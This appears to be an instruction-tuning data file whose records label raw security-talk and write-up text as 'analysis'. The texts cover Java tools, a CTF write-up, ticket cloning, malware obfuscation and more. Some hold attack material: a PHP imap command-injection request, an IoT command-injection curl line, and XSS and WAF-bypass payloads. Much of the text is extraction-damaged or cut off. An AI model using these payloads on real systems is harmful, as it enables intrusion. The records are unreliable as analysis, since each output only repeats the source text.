{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 工具 --- ## jconsole jconsole 是 JDK 自带的 GUI 工具jconsole(Java Monitoring and Management Console) 是一种基于 JMX 的可视化监视与管理工具 jconsole 的管理功能是针对 JMX MBean 进行管理由于 MBean 可以使用代码中间件服务器的管理控制台或所有符合 JMX 规范的软件进行访问 注意使用 jconsole 的前提是 Java 应用开启 JMX ### 开启 JMX Java 应用开启 JMX 后可以使用 jconsole 或 jvisualvm 进行监控 Java 程序的基本信息和运行情况 开启方法是在 java 指令后添加以下参数 ```java -Dcom.sun.management.jmxremote=true -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false -Djava.rmi.server.hostname=127.0.0.1 //指定 Java 程序运行的服务器 -Dcom.sun.management.jmxremote.port=18888 //指定 JMX 服务监听端口 ``` ### 连接 jconsole 如果是本地 Java 进程jconsole 可以直接绑定连接 如果是远程 Java 进程需要连接 Java 进程的 JMX 端口 ### jconsole 界面 进入 jconsole 应用后可以看到以下 tab 页面 * 概述 - 显示有关 Java VM 和监视值的概述信息 * 内存 - 显示有关内存使用的信息内存页相当于可视化的 jstat 命令 * 线程 - 显示有关线程使用的信息 * 类 - 显示有关类加载的信息 * VM 摘要 - 显示有关 Java VM 的信息 * MBean - 显示有关 MBean 的信息 --- ## jvisualvm jvisualvm 是 JDK 自带的 GUI 工具jvisualvm(All-In-One Java Troubleshooting Tool) 是多合一故障处理工具它支持运行监视故障处理性能分析等功能 ### jvisualvm 概述页面 jvisualvm 概述页面可以查看当前 Java 进程的基本信息如JDK 版本Java 进程JVM 参数等 ### jvisualvm 监控页面 ### jvisualvm 线程页面 jvisualvm 线程页面展示了当前的线程状态 jvisualvm 还可以生成线程 Dump 文件帮助进一步分析线程栈信息 ### jvisualvm 抽样器页面 jvisualvm 可以对 CPU内存进行抽样帮助我们进行性能分析 --- ## MAT MAT 即 Eclipse Memory Analyzer Tool 的缩写 MAT 本身也能够获取堆的二进制快照该功能将借助 `jps` 列出当前正在运行的 Java 进程以供选择并获取快照由于 `jps` 会将自己列入其中因此你会在列表中发现一个已经结束运行的 `jps` 进程 MAT 可以独立安装也可以作为 Eclipse IDE 的插件安装 - http://www.eclipse.org/mat/downloads.php ### MAT 配置 MAT 解压后安装目录下有个 `MemoryAnalyzer.ini` 文件 `MemoryAnalyzer.ini` 中有个重要的参数 `Xmx` 表示最大内存默认为`-vmargs -Xmx1024m` 如果试图用 MAT 导入的 dump 文件超过 1024 M会报错 ``` An internal error occurred during: \"Parsing heap dump from XXX\" ``` 此时可以适当调整 Xmx 大小如果设置的 Xmx 数值过大本机内存不足以支撑启动 MAT 会报错 ``` Failed to create the Java Virtual Machine ``` --- ## Arthas - https://github.com/alibaba/arthas Arthas 是 Alibaba 开源的 Java 诊断工具深受开发者喜爱在线排查问题无需重启动态跟踪 Java 代码实时监控 JVM 状态 Arthas 支持 JDK 6+支持 Linux/Mac/Windows采用命令行交互模式同时提供丰富的 Tab 自动补全功能进一步方便进行问题的定位和诊断 ### 安装 * 使用 arthas-boot(推荐) 下载 arthas-bo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## pcapin (forensics, 150p, 41 solves) > We have extracted a pcap file from a network where attackers were present. We know they were using some kind of file transfer protocol on TCP port 7179. We're not sure what file or files were transferred and we need you to investigate. We do not believe any strong cryptography was employed. > > Hint: The file you are looking for is a png > pcapin_73c7fb6024b5e6eec22f5a7dcf2f5d82.pcap ### PL Version `for ENG version scroll down` Dostajemy [plik .pcap](pcapin.pcap). Jest w nim tylko jeden interesujący stream tcp, więc wyciągamy od razu z niego dane (tylko wysyłane z serwera do klienta, chociaż wygląda na to że klient wysyła dane tym samym protokołem) do [osobnego pliku](rawdata.bin). W tym momencie rozpoczyna się analiza protokołu. Np. na pierwszy rzut oka widać powtarzający się fragment `00440000073200010000000000` w pierwszej części, a później wariacje na temat `00D423C60732001C00010000`. Oszczędzimy może analizy krok po kroku (bo była długa i burzliwa), ale kluczowe było zauważenie że dane dzielą się na pakiety, i pierwszy word każdego pakietu to długość tego pakietu. Wtedy możemy podzielić odpowiedź na pakiety, i widzimy dodatkowo że odpowiedź kończy sie zawsze bajtami `END`. Z tą wiedzą dekodujemy wszystkie pakiety po kolei, używamy trochę domyślności i dochodzimy do takiej oto struktury: struct packet { uint16_t length; uint16_t hash; uint16_t magic1; uint16_t conn_id; uint16_t seq_id; uint16_t unk2; uint8_t raw[10000]; }; Napisaliśmy mały tool do dumpowania zawartości poszczególnych pakietów z tej struktury: msm@andromeda /cygdrive/c/Users/msm/Code/RE/CTF/2015-09-16 csaw/forensics_200_pcapin $ ./a.exe PACKET 0 - size: 68 bytes - hash: 0 - magic1: 732 - conn_id: 1 - seq_id: 0 - unk2: 0 - calculated hash: f9e9 - rawdata: 00 25 f2 a9 8d 96 8a 8c 84 9c 87 8d c7 89 8d 9f e9 f9 e9 f9 e9 f9 e9 f9 e9 f9 e9 f9 e9 f9 e9 f9 e9 f9 e9 f9 e9 f9 e9 f9 e9 f9 e9 f9 e9 f9 e9 f9 e9 f9 e9 f9 e9 f9 60 00 PACKET 1 - size: 68 bytes - hash: 0 -", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# PHP imap 远程命令执行漏洞CVE-2018-19518 php imap扩展用于在PHP中执行邮件收发操作其`imap_open`函数会调用rsh来连接远程shell而debian/ubuntu中默认使用ssh来代替rsh的功能也就是说在debian系列系统中执行rsh命令实际执行的是ssh命令 因为ssh命令中可以通过设置`-oProxyCommand=`来调用第三方命令攻击者通过注入注入这个参数最终将导致命令执行漏洞 参考链接 - https://bugs.php.net/bug.php?id=77153 - https://github.com/Bo0oM/PHP_imap_open_exploit - https://antichat.com/threads/463395/#post-4254681 - https://nvd.nist.gov/vuln/detail/CVE-2018-19518 ## 漏洞环境 执行如下命令启动一个包含漏洞的PHP环境 ``` docker compose up -d ``` 环境启动后访问`http://your-ip:8080`即可查看web页面Web功能是测试一个邮件服务器是否能够成功连接需要填写服务器地址用户名和密码 目标源码在[index.php](www/index.php) ## 漏洞复现 发送如下数据包即可成功执行命令`echo '1234567890'>/tmp/test0001` ``` POST / HTTP/1.1 Host: your-ip Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 125 hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222 ``` 执行`docker compose exec web bash`进入容器可见`/tmp/test0001`已成功创建 ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCOPYRIGHT 2006 McAfee Inc.  Whats Next? Hacks-In-Taiwan 2006 Keynote Yen-Ming Chen Senior Principal Consultant Foundstone, A Division of McAfee 2 COPYRIGHT 2006 McAfee Inc. Agenda  Introduction  Security Ecosystem  Security Trends  Security Technology  Conclusion 3 COPYRIGHT 2006 McAfee Inc. Introduction Yen-Ming Chen  Sr. Principal Consultant  Been to 12 countries, 7 offices and 6 years with Foundstone  Contributing author of four security books and numerous published articles.  Master of Science in Information Networking from C.M.U.  Provide security risk assessment from web applications to emerging technologies 4 COPYRIGHT 2006 McAfee Inc. Security EcoSystem Government Corporate/Organization The Bad Guys General Public Attack Attack Attack Sell Products Sell Products Regulate Catch 5 COPYRIGHT 2006 McAfee Inc. A Chronology of Data Breaches Reported Since the ChoicePoint Incident (Feb, 2005) Unfortunately I am one of the innocent victim too! 6 COPYRIGHT 2006 McAfee Inc. Security Trend  The Problem 7 COPYRIGHT 2006 McAfee Inc. Vulnerability-to-worm cycle is shrinking 288 104 205 88 26 0 50 100 150 200 250 300 350 1999 2000 2001 2002 2003 Days 8 COPYRIGHT 2006 McAfee Inc. The sophistication of attacks is rising The sophistication of attacks is rising 9 COPYRIGHT 2006 McAfee Inc. Internet security has come a long way Internet Nirvana Internet Centric Internet Enabled Internet Aware Internet Isolated Firewalls Antivirus Consolidate authorization Outsourcing grunt work Enterprise Vulnerability Management Systems Risk Management Dashboard Application security Security resource dashboard Intrusion detection Vulnerability assessment Gartner Managing the Risks of IT Security September 2002  Internet Darwinism = Survival of the Fittest  From Reactive to Proactive  From Assessing to Managing 10 COPYRIGHT 2006 McAfee Inc. Security Technology Firewalls IDS VM/Risk Management Secure Coding / Secure Architecture Secure OS Vulnerability Assessment SSO PKI VPN Today IPS 1996 1998 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nShellcodes for ARM: Your Pills Dont Work on Me, x86 Svetlana Gaivoronski @SadieSv Ivan Petrov @_IvanPetrov_ Why its important q Increasing number of ARM-based devices q Significant number of vulnerable so:ware and huge base of reusable code q Memory corrup?on errors are s?ll there @SadieSv @_IvanPetrov_ Is it decidable? Ac?vator  NOP  GetPC Decryptor Payload Return address zone q Structure limita?ons q Size limita?ons @SadieSv @_IvanPetrov_ May be its not that bad? q Stack canaries: calculates pseudo-random number and saves it to the stack; q SafeSEH: instead of protecDng stack protects excepDon handlers ; q DEP: makes stack/part of stack non- executable; q ASLR: randomizes he base address of executables, stack and heap in a processs adress space . BYPASSED @SadieSv @_IvanPetrov_ Okay, whats the ARM problem? q Shellcodes are already there q Shellcode detec?ons methods (okay, smarter than signature-based) are not Are x86-based methods are applicable here? For analysis of appicapability of х86based techniques for ARM its reasonable to understand differences of two platforms. @SadieSv @_IvanPetrov_ Main differences of two platforms: q Commands size is fixed; q 2 different CPU modes (32bit and 16bit)and possibility to dynamic switching between them; q Possibility of condiDonal instrucDon execuDon; q Possibility of direct access to PC; q load-store architecture (not possible to access memory directly from arithmeDc instrucDons); q FuncDon arguments (and return address as well) go to registers, not stack. @SadieSv @_IvanPetrov_ i f ( e r r != 0) p r i n t f ( \" Er r o r c o d e = %i \\ n \" , e r r ) ; e l s e p r i n t f ( \"OK! \\ n \" ) ; CMP r1 , #0 BEQ . L4 LDR r0 , < string_1_address > BL prin] B . L8 . L4 : LDR r0 , < string_2_address > BL prin] . L8 : CMP r1 , #0 LDRNE r0 , < string_1_address > LDREQ r0 , < string_2_address > BL prin] Without condi?onal instruc?ons With condi?onal instruc?ons Condi?onal execu?on @SadieSv @_IvanPetrov_ Thumb CPU mode chmod(\"/etc/passwd\", 0", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIOT安全 - 测信道实战 演讲人KEVIN2600 2019 @Kevin2600 议程 . 测信道的那点事 . 测信道案例简析 . 测信道 Power Analysis 测信道的那点事 测信道攻击是一种针对软件或硬件设计缺陷, 剑走偏锋的攻击方式 攻击途径通常采用被动式监听, 或通过特殊渠道发送隐蔽数据信号 攻击点不在暴力破解, 而是通过功耗; 时序; 电磁泄漏等方式达到 破 解 目 的 . 在 很 多 物 理 隔 绝 的 环 境 中 , 往 往 也 能 出 奇 制 胜 测信道 测信道 . Public key signature check . Bootloader 加固 (bootdelay = 0) . 屏蔽调试端口 UART; JTAG; SPI; I2C . 电子设备全部物理隔离 (Air Gapping) 测信道 WordPress 测信道 Drupal 测信道门禁 测信道门禁 被动式: : 声波信号采集还原打印机原文 : 美国 NSA 电磁波监听 (TEMPEST) : 功耗分析破解南韩公交卡密钥系统 (3DES) : 功耗分析获取 Philipe Hue 智能灯系统密钥 (AES) 主动式: : Xbox360 Glitch 攻击 (运行 unsigned code) : 智能网关 Hue NAND Glitch (得到 Root 权限) : 通过毛刺注入成功获取硬件钱包 Trezor 闪存敏感信息 : 以色列 Ben-Gurion 大学通过 USB 发送电磁信号 (USBee) 测信道案例简析 时耗分析 时耗分析 NAND-Glitch NAND-Glitch 物联网设备网关 (WinkHub) 通过网页对其进行访问 (set_dev_value.php) curl 192.168.01/set_dev_value.php -d nodeId=a&attrId=; uname -a; NAND-Glitch . NAND Flash 通常存储固件; Bootloader; 内核以及root files . 使用数据线在系统启动, 读取 NAND 内核信息瞬间, 短接 I/O pin . 在正确的时间点, 阻止 Bootloader 读取正确的内核数据从而进入 shell 模式 NAND-Glitch 测信道 Power Analysis 功耗分析 . Power analysis (Simple & Differential) . 处理器运行不同指令在功耗需求上也不近相同 . 需要了解目标设备所采用的加密算法 . 信号的采集必须在加密或解密的过程中完成 功耗分析 功耗分析 (ChipWhisperer) . Colin O'Flynn 设计制作, 学习 SCA 功耗分析和毛刺注入神器 . 基于Python 跨平台开源软硬件项目 (Windows; Linux; MacOS) . 可用于时序或电压毛刺注入攻击测试, 产生 <2nS 的脉冲信号 . 通过 DPA 差分功耗分析获取诸如 RSA; AES; 3DES 等加密密钥 功耗分析 (SPA) . 处理器运行验证指令在功耗表现上不尽相同 . 密码验证过程功耗表现 (密码错误 -->无限循环) . 寻找目标设备在特定时刻 (加密/解密) 功耗图形的差异 功耗分析 (SPA) 功耗分析 (DPA) 目标设备 测量方法 测量结果 功耗分析 (DPA) 功耗分析 (DPA) 功耗分析 (AES-128) 功耗分析 (DPA) 功耗分析 (电磁信号) . 电磁波可通过 H 探头和软件无线电设备远程获取 . 芯片01转换产生电磁波从空气中泄漏, 其中包含密 钥指纹信息 . Tel Aviv 大学科研人员通过测量分析电磁发射获取 GnuPG 密钥信息 功耗分析 (电磁信号) 功耗分析 (DPA) One More Thing .. 测信道 EMFI 测信道 EMFI 测信道 EMFI 测信道 EMFI 测信道 EMFI Summary 百分百安全的系统并不存在 边信道分析与防御, 硬件安全必备技能 完美的设计, 实施过程中百密疏, 将导致系统完全崩溃 谢谢观看 演讲人KEVIN2600", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStolen Data Markets: An Economic and Organizational Assessment This project was supported by Award No. 2010-IJ-CX-1676, awarded by the National Institute of Justice, Office of Justice Programs, U.S. Department of Justice. The opinions, findings, and conclusions or recommendations expressed in this publication are those of the authors and do not reflect those of the Department of Justice. Thomas J. Holt Michigan State University holtt@msu.edu Olga Smirnova Eastern Carolina University Yi-Ting Chua Michigan State University Stolen Data Markets  There is an increasingly large body of research on the organization and dynamics of the market for stolen data  IRC (Franklin et al., 2007; Herley & Florencio, 2010; Holz et al., 2009; Honeynet Research Alliance, 2003; Thomas & Martin, 2006)  Forums (Chu et al., 2010; Holt & Lampke, 2010; Motoyama et al., 2011; Yip et al., 2013) Stolen Data Markets  Few studies have estimated the economics of the market or the organizational dynamics present  Herley and Florencio (2010) and Wehinger (2011) argue that there may be multiple markets operating at any point in time  Lower priced markets with greater risk for participants and minimal barriers to entry  Higher priced markets with insularity, trust, and organization The Present Study This study is designed to address multiple questions:  What are the costs for goods and services in this market like and what conditions impact this economy?  What is the social organization of the market and how does it affect participants?  What are the network structures between individual participants and how do they resemble other criminal organizations? Data Sources: 13 Active Forums Forum Descriptive Statistics for Forums Sampled (n=13) Number of Threads Hosting Country Language 1 55 DE RU 2 128 US ENG 3 6 US RU 4 144 VG RU 5 89 UK RU 6 44 RU RU 7 202 RU ENG/RU 8 590 LV ENG 9 312 RU ENG/RU 10 35 DE RU 11 60 RU RU 12 71 NL RU 13 153 LU RU Economic Analyses- Products Sold Data Acquisition  Phishing  Sk", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDOM-XSS 漏洞的挖掘与攻击面延伸 陈思涛 北京长亭科技有限公司深圳分公司Web安全研究员 目录 DOM-XSS 挖掘与利用 DOM-XSS 常见位置 DOM-XSS 优势在哪 XSS 巧妙利用 DOM-XSS常见位置 DOM-XSS 常见位置 1URL代入页面 这类DOM-XSS是最常见的它的漏洞点通常是以下形式出现 DOM-XSS 常见位置 它出现的地方比较多可能会是名称地点标题等等 大多数情况下它和反射型XSS的区别不大最大的区别是取的值不同 此时取值时匹配的URL是location.href这个值包含了 location.search 和 location.hash 的值而 location.hash 的值是不被传到服务器并且能被前端 JS通过 getUrlParam 函数成功取值 DOM-XSS 常见位置 2跳转 在 javascript 语法中使用如下代码可以将页面进行跳转操作 DOM-XSS 常见位置 这样的跳转通常会出现在登录页退出页中间页 如果开发者让用户可以控制 redirecturl 参数就可以使 用 javascript:alert(1) 的形式进行XSS攻击 最近几年的APP开发比较热门通过web唤起APP的操作也是越来越多跳转的协议也 是多种多样例如 webview:// , myappbridge://等等 仅仅使用 http 和 https 来判断URL是否合法已经不适用了于是由跳转所产生的 DOM-XSS漏洞也逐渐增多 3postMessage DOM-XSS 常见位置 postMessage 支持跨域使用使用场景比较广泛如支付成功登录退出唤起 APP等等 这段代码中监听了message事件取了 e.data 的值也就是来自于其他页面 上的message消息但是没有检测来源如果页面允许被嵌套即可嵌套该页面 再使用 window[0].postMessage 即可向该窗口发送数据 DOM-XSS 常见位置 DOM-XSS 常见位置 4window.name window.name 与其他 window 对象不同它在窗口刷新后会保留 当这个页面刷新跳转到其他网站时如果这个网站没有对 window.name 进行设置那么当前 window.name的值仍然是Foo DOM-XSS 常见位置 5缓存 开发者在缓存前端数据的时候通常会存在 sessionStorage , localStorage , cookie 中因为 sessionStorage 在页面刷新时就失效的特性利用方式相对简单的 只有后面两种 DOM-XSS 常见位置 Cookie 根据浏览器的同源策略Cookie是可以被子域名读到的 一旦我们发现在 http://example.com/setCookie.php?key=username&value=nick 下可以设置Cookie, 就可以结合一些读取Cookie的页面进行XSS攻击 DOM-XSS 常见位置 localStorage localStorage 的特性和Cookie类似但它和Cookie不同的是Cookie被设置过之后 具有有效期这个特性而localStorage被设置过后只要不手动清除或覆盖这个值永远 不会消失 Cookie中通常会存放少量的缓存信息像用户的头像URL用户名等等而localStorage 中通常会存放一些大量需要重复加载的数据如搜索历史记录缓存JS代码等等这些 值被修改过以后大部分开发者都不会去校验它的合法性是否被修改过 DOM-XSS 优势在哪 DOM-XSS 优势在哪 避开WAF 正如我们开头讲的第一种DOM-XSS可以通过 location.hash 的方式将参数写在 # 号后既能让JS读取到该参数又不让该参数传入到服务器从而避免了WAF的检测 可以使用 ja%0avasc%0aript:alert(1) , j\\x61vascript:alert(1) 的形式绕过 可以利用 postMessage,window.name,localStorage 等攻击点进行XSS攻击的攻击代 码不会经过WAF DOM-XSS 优势在哪 长度不限 当我们可以用当前页面的变量名作为参数时可以使用 <iframe src=\"http://example.com/?poc=name\"> 的方式进行攻击 DOM-XSS 优势在哪 隐蔽性强 攻击代码可以具有隐蔽性持久性 例如使用Cookie和localStorage作为攻击点的DOM-XSS非常难以察觉且持续的时间 长 XSS 巧妙利用 Chrome Api chromium支持开发者扩展api厂商在开发浏览器的时候或是为了自己的业务需求或是 出于用户体验会给浏览器扩展上一些自己的接口这些接口比较隐蔽且只接口来", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefCon (China) 1, Beijing 2019 打破后端限制 Gregory Pickett, 获得CISSP, GCIA, GPEN等 多项认证 芝加哥, 伊利利诺斯州 gregory.pickett@hellfiresecurity.com Hellfire Security 概述 交通系统 逆向工程 我的发现 漏漏洞洞利利用 经验总结 简史 地铁黑客剖析(2008) NFC地铁黑客(2012) 如何侵入全国交通网络2012 利利用边信道攻击破解韩国交通卡 2017 有何不不同 绝不不违法 我们不不会偷偷溜溜进车站 我们不不会攻击终端 我们不不利利用社会工程学也不不攻击有线 /无线网络 无关硬件 我们不不会破解任何人的密码 我们不不会克隆隆磁条无线射频卡NF C等 有何不不同 而是关于 应用程序的逻辑缺陷 好吧实际上用到了了克隆隆但不不是将 其作为漏漏洞洞进行行利利用 利利用应用程序安全来攻击现实世界中 复杂的多层次解决方案 城铁 曼谷捷运公司BTS 曼谷城铁交通系统 服务于整个曼谷地区 由曼谷捷运公司BTSC运营 两条城铁线沿途共43个车站 车票 储值卡NFC 单日票磁条和单程票磁条 设有两个磁条 打孔穿过其中一个磁条 薄厚仅0.27毫米 车票 车票 车票 闸门 进站 出站 为什什么选择他们 真的只有磁条吗 一定还有其他东西 长久以来饱受威胁 不不得不不继续前进 设备 标准读/写器器 中国制造 标准或原始读数 错误罕见 可靠的性能 问题 数据位置 编码方案 数据变化 数据含义 系统响应 数据篡改 重复状态或无序转换 实验室工作 读取磁条 解码数据 实验室工作 实验室工作 尝试标准解码 国际标准化组织 6位字符集和4位字符集 有些使用奇偶校验有些则不不使用 尝试对其前后数据解码 未使用相关标准 实验室工作 * The section marked Known is always 100 + the price of the ticket 实验室工作 没有加密 没有奇偶校验 没有纵向冗余检查LRC 没有时间戳 现场工作 在城铁系统中使用车票 每次使用不不同输入值 观察数据变化 通过变化来确认其含义 现场工作 现场工作 GUID% GUID% GUID% Station% Dispenser% Station% Turn-style% 现场工作 0x00E078401A327826E91E76ED00FF7400D20FE948AE0A41 Issued Used Collected Buying Entering Exiting 0x00E078401A327826E91E76ED00FF74801C0FE948D8681B 0x00E078401A327826E91E76ED00FF74801C0FE948D8681B 现场工作 对于单日票已知部分或者100+ 价格部分被用来追踪行行程 单日票有一项独特的永不不变更更项 处理理规则 进站 购票前车票必须处于collected状态 进站前车票必须处于Issued阶段 出站, 出站前车票必须处 于Used状态 军政府的研究 局势 合法权益 尽量量不不被逮捕 躲避安检 浸渍 终极手段 当地文化 因扰乱秩序而受罚 不不会留留意 不不会关心 哪些规程 Avoiding Farang 利利用该系统 当前已知信息 系统安全措施 BTS的假设 对假设进行行攻击 史诗般的失败 当前已知信息 基于对象 物理理对象 数据库对象 属性 识别 值 位置 当前已知信息 状态 Issued Used Collected 历史 系统安全措施 交通卡的组成和设计 镜像物理理对象和数据库对象 处理理规则定义了了如何有效使用对象 使用周期限制为24小时 交通卡用完后将被回收 BTS的假设 没人能复制我们的交通卡 我们的系统只存在有效对象 处理理规则能够防止车票并发使用 使用周期的限制降低了了损害的发生 使用后车票将在我们手中 对假设进行行攻击 获取合适的车票 捕捉有效对象 绕过规则 扩展攻击以增加损害 史诗般的失败 制作空白车票 复制大量量处于Issued状态的对象 发现处理理规则中的缺陷 在当前使用周期中寻找Collected 状态 覆盖其他所有状态 对象最近的状态都为Collected 运行行原始车票 所有复制票立即生效 史诗般的失败 Issued Used Collected Entering Exiting Original Original Original Issued Used Collected Copy Copy Copy Issued Used Collected Copy Copy Copy Issued Used Collected Copy Copy Copy Colle", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVLAN Hopping, ARP Poisoning & Man-In-The-Middle Attacks in Virtualized Environments Ronny Bull Dr. Jeanna Matthews & Kaitlin Trumbull (DEF CON 24) Road Map  2016 Ronny L. Bull - Clarkson University  Context for the Problem of Layer 2 Network Security in Virtualized Environments  Virtualization, Multi-tenant environments, Cloud services  Test platforms  Array of virtual networking implementations tested  Specific attacks and results  MAC Flooding, DHCP Attacks (previously discussed at DEF CON 23  VLAN Hopping, ARP Poisoning (this talk)  Conclusions  2016 Ronny L. Bull - Clarkson University  All client virtual machines hosted in a multi-tenant environment are essentially connected to a virtual version of a physical networking device. So do Layer 2 network attacks that typically work on physical devices apply to their virtualized counterparts?  Important question to explore:  All cloud services that rely on virtualized environments could be vulnerable  This includes data centers hosting mission critical or sensitive data!  Not the only class of attacks from co-located VMs  Old lesson: vulnerable to those close to you Key Question What If?  2016 Ronny L. Bull - Clarkson University  2016 Ronny L. Bull - Clarkson University  Our research proves that virtualized network devices DO have the potential to be exploited in the same manner as physical devices.  In fact some of these environments allow the attack to leave the virtualized network and affect the physical networks that they are connected to! Bottom Line  2016 Ronny L. Bull - Clarkson University  So what if a malicious tenant successfully launches a Layer 2 network attack within a multi-tenant environment?  Capture all network traffic  Redirect traffic  Perform Man-in-the-Middle attacks  Denial of Service  Gain unauthorized access to restricted sub-networks  Affect performance Consequences  MAC Flooding Attack  Performance evaluation updates since our last talk  VLAN Hopping  Attack Scenario Descriptions  Summary of ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n目 第 1 章 通过原则和策略的安全治理. 1 川 理解和应用机密性 完整性 和可用性的概念.........................2 1.1.1 机密性................................2 1.1.2 完整性......... 3 1.1.3 可用性................................4 1.1.4 其他安 全概念......................5 1.1.5 保护机制.............................8 1 . 2 应用安全治理原则..................9 1.2.1 安 全功能战略 目标 任务和愿景的一致 ........9 1.2.2 组织流程.........11 1.2.3 安 全角色和责任.......15 1.2.4 控制架构........................16 1.2.5 应尽关注和应尽职责.......16 1.3 开发和文档化安全策略 标准 指导方针和程序........17 1.3.1 安 全策略.................17 1.3.2 安 全标准 基准及指南..........18 1.3.3 安 全程序...........................18 1.4 理解和应用威胁建模..................19 1.4.1 识别威胁...................'.20 1.4.2 确定和用图表示潜在攻击.......22 1.4.3 执行降低分析...........23 1.4.4 优先级和响应...................23 1. 5 把安全风险考虑到收购 策略和实践中................ 24 1. 6 本章小结........ ...............25 1. 7 考试要点..............'.26 ' 录 1.8 书面实验室 .....................28 1. 9 复习题 .......................\"28 第 2 章 人员安全和风险管理概念.........31 2.1 促进人员安全策略................32 2.1.1 筛选候选人........................34 2.1.2 雇佣协议和策略..............34 2.1.3 M雇员 工的流程.......35 2.1.4 供应商 顾问和承包商控制 \"'37 2.1.5 合规 性..........................38 2.1.6 隐私.................................38 2. 2 安全治理............................39 2.3 理解和应用风险管理概念  39 2.3.1 风险术语.........40 2.3.2 识别威胁和脆弱性...... .42 2.3.3 风险评估/分析 ..............43 2.3.4 风险分配/接受 ..48 2.3.5 对策的选择和评估.................49 2.3.6 实施........................50 2.3.7 控制的类型.....................51 2.3.8 监控和测量........................52 2.3.9 资产评估........................52 2.3.10 持续改进....................53 2.3.11 风险框架.........................54 2.4 建立和管理信息安全教育 培训和意识............................. 55 2. 5 管理安全功能......................\"56 2.6 本章小结..................................57 2. 7 考试要点................57 2.8 书面实验室 ..............................59 XXVI CISSP 官方学习指南(第 7 版) 2. 9 复习题..................................59 第3章 业务连续性计划 ...................63 3.1 业务连续性计划..........................63 3. 2 项目范围与计划.64 3.2.1 业务组织分析.................65 3.2.2 BCP团队的选择..........", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n收到情报->追番ing->顺便看看->认证绕过 git clone https://github.com/ehang-io/nps.git git pull 些本信息 框架beego 档docs/api.md 直奔鉴权逻辑去 -> web/controllers/base.go 默认情况下auth_key配置是注释掉的,本能的想到获取到值可能为空,那结合时间戳算下 md5Key,认证就绕过了实际测试也是如此 代理具nps认证绕过 Done", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n11 Dark.Net Dark.Net gasgas gasgas 22 簡介 簡介 Malware Malware Dot Net Framework Dot Net Framework .net .net rootkit rootkit Anti tech Anti tech Q & A Q & A 33 Malware Malware 44 Malware Malware Virus Virus Backdoor Backdoor Trojan horse Trojan horse Rootkit Rootkit Scareware Scareware Adware Adware Worm Worm 55 Infect Infect Executable Executable Interpreted file Interpreted file Kernel Kernel Service Service MBR MBR Hypervisor Hypervisor 66 Hypervisor rootkit Hypervisor rootkit Target OS Target OS Hardware Hardware App App App App 77 Hypervisor rootkit Hypervisor rootkit Target OS Target OS Hardware Hardware App App App App Virtual machine monitor Virtual machine monitor Host OS Host OS Rogue app Rogue app 88 Malware Malware design & tech design & tech Metamorphism Metamorphism Obfuscations Obfuscations Anti Anti--emulation emulation Anti Anti--Virtual Machine Virtual Machine Anti Anti--debuggers debuggers Rootkit Rootkit Technology Technology 99 Metamorphism Metamorphism mov [ebp - 3], eax push ecx mov ecx,ebp add ecx,33 push esi mov esi,ecx sub esi,34 mov [esi-2],eax pop esi pop ecx push ecx mov ecx, ebp push eax mov eax, 33 add ecx, eax pop eax push esi mov esi, ecx push edx mov edx, 34 sub esi, edx pop edx mov [esi - 2], eax pop esi pop ecx push ecx mov ecx, [ebp + 10] mov ecx, ebp push eax add eax, 2342 mov eax, 33 add ecx, eax pop eax mov eax, esi push eax mov esi, ecx push edx xor edx, 778f mov edx, 34 sub esi, edx pop edx mov [esi-2], eax pop esi pop ecx push ecx mov ecx,ebp add ecx,33 mov [ecx-36],eax pop ecx 10 10 Obfsucations Obfsucations Call Obfsucations to prevent static analysis NORMAL CALL L0: call L5 L1:  L2:  L3:  L4:  L5: <proc> L6:  OBFUSCATED CALL L0a: push L1 L0b: push L5 L0c: ret L1:  L2:  L3:  L4:  L5: <proc> L6:  11 11 Anti Anti--emulation emulation vs vs anti anti--debug debug Anti Anti--debug debug  Hide the fact that someone with a debugger is Hide the fact that someone with a debugger is stepping/monitoring your program stepping/monitorin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHydra  Advanced x86 polymorphic engine  Incorporates existing techniques and introduces new ones in one package  All but one feature OS-independent Random register operations  Different synonymous instructions per invocation.  Hydra provides a large library of such instructions and a platform to add more.  For some operations, the key used is randomly generated to further obfuscate the payload. Two ways to clear a register Method 1: mov reg, <key> sub reg, <key> Method 2: push dword <key> pop reg sub reg, <key> Recursive NOP generator  Traditional shellcode engines use static array of possible NOPs to generate NOP sleds  not very random!  Hydra uses a built-in NOP generator that dynamically builds a library of possible NOP instructions.  Find all 1-byte NOP by brute-force. Brute-force two-byte NOPs where 2nd byte is another NOP. Repeat. Larger NOP instructions recursively contain smaller 